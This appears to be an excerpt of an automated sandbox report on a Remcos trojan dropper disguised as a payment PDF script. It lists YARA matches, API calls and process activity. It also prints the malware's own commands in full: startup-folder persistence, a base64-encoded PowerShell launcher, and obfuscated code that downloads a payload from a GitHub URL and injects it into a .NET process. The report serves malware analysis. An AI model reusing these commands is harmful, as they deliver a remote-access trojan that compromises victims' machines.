                Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 8.2.powershell.exe.20011562480.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 8.2.powershell.exe.20011562480.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 00000008.00000002.2331620773.000002001007E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000008.00000002.2331620773.000002001111A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3180, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3836, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3836, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: AddInProcess32.exe PID: 6308, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@17/8@5/4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,11_2_00415C90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,11_2_0040E2E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,11_2_00419493
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 11_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_00418A00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\remcosJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-YJH0WY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3wd3nil0.nlv.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs"
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')')
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+'; '+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent = [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+' [dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA, e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39) )"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')')Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRFblY6Y09tU1BlY1s0LDE1LDI1XS1KT0lOJycpKCAoJ1NIc3VybCAnKyc9JysnIDNkS2h0JysndCcrJ3BzOicrJy8vJysncmEnKyd3LmdpdGgnKyd1YnVzZScrJ3Jjb250ZW50LmNvbS9Ob0QnKydldCcrJ2VjdE9uL05vRGUnKyd0ZWN0T24vcmVmcy9oZWFkcy9tYWluL0RldCcrJ2FoTm90aC1WLicrJ3QnKyd4JysndDNkSycrJzsgJysnU0hzJysnYmFzZTY0Q29udGUnKydudCA9ICcrJyhOZXctTycrJ2JqZScrJ2N0JysnICcrJ1MnKyd5c3RlJysnbS5OZScrJ3QuV2ViQ2xpZW50KS5EbycrJ3dubG9hZFN0cmluZyhTSHN1cmwnKycpOyAnKydTSHNiaW5hcnknKydDb250JysnZW50ID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0JysncmluZyhTSHMnKydiYXNlNicrJzQnKydDb250ZW50KTsnKycgU0hzYXNzZW1iJysnbHkgPSBbUicrJ2VmbGVjJysndGlvbi5Bc3NlbWJseV06OicrJ0xvYWQoU0hzJysnYicrJ2luYScrJ3J5Q29udCcrJ2VudCk7JysnIFtkbmxpYi5JTy5IJysnb21lXTo6VkFJKGVXJysnQTAvSlU0YmYvZC9lZScrJy4nKydldHNhcC8vOnNwdHQnKydoZVdBLCAnKydlJysnV0FkJysnZXNhdGl2YWRvZScrJ1dBLCBlV0FkZXNhdGknKyd2YWQnKydvZVdBLCBlJysnV0FkZXNhdCcrJ2l2YWRvZVdBLCBlJysnV0FBZCcrJ2RJblByb2Nlc3MzJysnMmVXQSwgZScrJ1cnKydBZVdBLGVXQWUnKydXQSknKS5yRXBsYWNFKChbY0hBcl0xMDErW2NIQXJdODcrW2NIQXJdNjUpLFtzVHJJbmddW2NIQXJdMzQpLnJFcGxhY0UoJ1NIcycsW3NUckluZ11bY0hBcl0zNikuckVwbGFjRSgoW2NIQXJdNTErW2NIQXJdMTAwK1tjSEFyXTc1KSxbc1RySW5nXVtjSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\PAYMENT SPECIFIKACIJA 364846637-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadilibisnapxe.vbs')')Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $EnV:cOmSPec[4,15,25]-JOIN'')( ('SHsurl '+'='+' 3dKht'+'t'+'ps:'+'//'+'ra'+'w.gith'+'ubuse'+'rcontent.com/NoD'+'et'+'ectOn/NoDe'+'tectOn/refs/heads/main/Det'+'ahNoth-V.'+'t'+'x'+'t3dK'+'; '+'SHs'+'base64Conte'+'nt = '+'(New-O'+'bje'+'ct'+' '+'S'+'yste'+'m.Ne'+'t.WebClient).Do'+'wnloadString(SHsurl'+'); '+'SHsbinary'+'Cont'+'ent = [System.Convert]::From'+'Ba'+'se64St'+'ring(SHs'+'base6'+'4'+'Content);'+' SHsassemb'+'ly = [R'+'eflec'+'tion.Assembly]::'+'Load(SHs'+'b'+'ina'+'ryCont'+'ent);'+' [dnlib.IO.H'+'ome]::VAI(eW'+'A0/JU4bf/d/ee'+'.'+'etsap//:sptt'+'heWA, '+'e'+'WAd'+'esativadoe'+'WA, eWAdesati'+'vad'+'oeWA, e'+'WAdesat'+'ivadoeWA, e'+'WAAd'+'dInProcess3'+'2eWA, e'+'W'+'AeWA,eWAe'+'WA)').rEplacE(([cHAr]101+[cHAr]87+[cHAr]65),[sTrIng][cHAr]34).rEplacE('SHs',[sTrIng][cHAr]36).rEplacE(([cHAr]51+[cHAr]100+[cHAr]75),[sTrIng][cHAr]39) )"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
